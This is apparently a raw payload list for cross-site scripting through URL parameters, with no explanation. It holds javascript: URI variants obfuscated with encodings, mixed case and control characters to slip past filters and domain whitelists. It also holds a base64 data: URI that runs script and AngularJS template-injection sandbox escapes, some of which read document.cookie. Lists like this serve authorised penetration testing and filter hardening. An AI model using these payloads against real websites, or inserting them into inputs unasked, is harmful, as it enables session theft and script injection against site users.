URL=javascript:confirm(1)
URL=javascript:confirm(1);
URL=javascript://%0aalert(1)
URL=javascripT://anything%0D%0A%0D%0Awindow.confirm(document.cookie)
URL=javascript://https://example.com/?z=%0Aconfirm(1)
URL=javascript://example.com?%a0confirm%281%29
URL=javascript://https://www.whitelisteddomain.tld/?z=%0Aconfirm(1)
URL=javascript://%250Aconfirm(1)//?1
URL=javascript://%250A1?confirm(1):0
URL=javascript://https://whitelisted.com/?z=%0Aconfirm(1)
URL=jaVAscript://whitelisted.com//%0d%0aconfirm(1);//
URL=javascript://whitelisted.com?%a0confirm%281%29
URL=javascript://%250Alert(document.location=document.cookie)
URL=jaVAscript://www.whitelisteddomain.tld//%0d%0aalert(1);//

URL=java%0d%0ascript%0d%0a:confirm(0)
URL=javaSCRIPT&colon;confirm(1)>
URL=java%0d%0ascript%0d%0a:confirm(0)
URL=javascript://%250Aconfirm(1)
URL=java%0ascript:confirm(1)
URL=java%09script:confirm(1)
URL=java%0dscript:confirm(1)
URL=javascript://%0aconfirm(1)
URL=Javas%26%2399;ript:confirm(1)

URL=/javascript:confirm(1)
URL=//javascript:confirm(1)
URL=/%5cjavascript:confirm(1)
URL=//%5cjavascript:confirm(1)
URL=/%09/javascript:confirm(1)

URL=";confirm(0);//

URL=<>javascript:confirm(1);
URL=\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aconfirm(1)
URL=\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aconfirm(1)
URL=ja\nva\tscript\r:confirm(1)
URL=\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
URL=\152\141\166\141\163\143\162\151\160\164\072confirm(1)
URL=%19Jav%09asc%09ript:https%20://www.whitelisteddomain.tld/%250Aconfirm%25281%2529
URL=%09Jav%09ascript:alert(document.domain)
URL=/x:1/:///%01javascript:confirm(document.cookie)/

URL=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=
URL=data:www.whitelisteddomain.tld;text/html;charset=UTF-8,<html><script>document.write(document.domain);</script><iframe/src=xxxxx>aaaa</iframe></html>

URL=amF2YXNjcmlwdDovLyUwQWFsZXJ0KGRvY3VtZW50LmRvbWFpbik=

URL={{$on.constructor('confirm(document.cookie)')()}}
URL={{constructor['constructor']('window["confirm"]("Professor")')()}}
URL={{}}{{-function(){this.confirm(1)}()}}
URL={{$on.constructor('confirm(4)')()}}
URL={{$el.ownerDocument.defaultView.confirm(1)}}
URL={{location='javascript:confirm\x281\x29'}}
URL={{-function(){this.confirm(23)}()}}
URL={{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'confirm(25)')()}}
